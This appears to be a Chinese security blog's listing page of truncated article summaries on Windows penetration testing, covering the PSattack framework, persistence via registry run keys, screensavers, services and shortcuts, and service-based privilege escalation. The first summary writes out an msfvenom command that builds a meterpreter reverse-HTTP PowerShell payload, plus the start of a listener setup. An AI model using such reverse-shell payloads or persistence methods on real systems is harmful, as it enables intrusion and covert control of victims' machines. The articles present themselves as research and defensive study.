摘要:
写在前面,我自己的操作: kali下: msfvenom -p windows/x64/meterpreter_reverse_http -f psh -o m64.ps1 LHOST=192.168.0.112msfconsole里: msf6 > use exploit/multi/handle 阅读全文
摘要:
PSattack:一个渗透测试中使用的万能框架 嘶吼RoarTalk 网络安全观察者 导语:这段时间以来,以powershell为载体,大牛们开发出了很多有趣的东西。比如Invoke-Phant0m日志清除器就在其中。这篇文章就是用来讲述一个将这些渗透测试脚本集合起来的框架:PSattack。 什么 阅读全文
摘要:
Window下常见的权限维持方式 系统安全 Bypass007 2019-12-10 10,297 在获取服务器权限后,通常会用一些后门技术来维持服务器权限,服务器一旦被植入后门,攻击者便如入无人之境。本文将对常见的window服务端自启动后门技术进行解析,知己知彼方能杜绝后门。 0x01 注册表自 阅读全文
摘要:
Window权限维持(五):屏幕保护程序 Web安全 Bypass007 2019-12-04 10,068 屏幕保护是Windows功能的一部分,使用户可以在一段时间不活动后放置屏幕消息或图形动画。众所周知,Windows的此功能被威胁参与者滥用为持久性方法。这是因为屏幕保护程序是具有.scr文件 阅读全文
摘要:
Window权限维持(一):注册表运行键 资讯 Bypass007 2019-11-11 6,056 译文声明:本文由Bypass整理并翻译,仅用于安全研究和学习之用。 原文地址:https://pentestlab.blog/2019/10/01/persistence-registry-run- 阅读全文
摘要:
Window权限维持(三):新服务 系统安全 Bypass007 2019-12-04 7,159 如果未正确配置Windows环境中的服务或这些服务可以用作持久性方法,则这些服务可能导致权限提升。创建一个新的服务需要管理员级别的特权,它已经不是隐蔽的持久性技术。然而,在红队的行动中,针对那些在威胁 阅读全文
摘要:
Window权限维持(四):快捷方式 系统安全 Bypass007 2019-12-04 8,935 Windows快捷方式包含对系统上安装的软件或文件位置(网络或本地)的引用。自从恶意软件出现之初,便已将快捷方式用作执行恶意代码以实现持久性的一种方法。快捷方式的文件扩展名是.LNK,它为红队提供了 阅读全文
摘要:
原文:https://blog.csdn.net/qq_27446553/article/details/50511373 0x00 简介 通常,在Windows下面我们可以通过内核漏洞来提升权限,但是,我们常常会碰到所处服务器通过内核漏洞提权是行不通的,这个时候,我们就需要通过脆弱的Windows 阅读全文